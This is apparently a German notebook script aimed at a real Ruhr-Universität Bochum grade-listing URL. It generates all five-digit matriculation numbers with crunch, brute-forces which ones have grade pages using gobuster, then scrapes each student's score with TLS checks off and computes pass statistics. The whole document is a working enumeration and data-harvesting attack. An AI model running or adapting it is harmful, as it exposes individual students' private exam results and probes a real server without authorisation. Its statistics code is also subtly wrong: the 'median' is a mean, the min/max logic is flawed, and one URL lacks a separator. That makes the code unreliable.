# 1. mögliche Matrikel erzeugen

crunch 5 5 0123456789 -o matrikel.txt

# 2. Gültige Matrikel finden

gobuster dir -u https://www.ruhr-uni-bochum.de/lmi/lehre/ti_ws2122/noten_ti_1/ -k -w matrikel.txt -o found -n --hide-length

# 3. Statistiken erzeugen

In [ ]:
from multiprocessing.pool import ThreadPool
from multiprocessing import freeze_support
from requests import get
from re import findall
import requests

requests.packages.urllib3.disable_warnings()
min, max, median, passed, not_passed = 100, 0, 0, 0, 0

def main(m):
    global min, max, median, passed, not_passed
    r = get(f"https://www.ruhr-uni-bochum.de/lmi/lehre/ti_ws2122/noten_ti_1{m}", verify=False)
    note = int(findall("\d+ P",r.text)[0][:-2])
    if note < min: min = note
    elif note > max: max = note
    median += note
    if note<50: not_passed+=1
    else: passed+=1

freeze_support()
with open("found", 'r') as f: matrikel = f.readlines()
with ThreadPool() as p: p.map(main, list(m.strip() for m in matrikel))

print(f"Anzahl Klausuren: {len(matrikel)}")
print(f"Beste Note:       {max}%")
print(f"Schlechste Note:  {min}%")
print(f"Median:           {median//len(matrikel)}%")
print(f"Bestanden:        {passed/len(matrikel)*100:,.2f}%")
print(f"Nicht-Bestanden:  {not_passed/len(matrikel)*100:,.2f}%")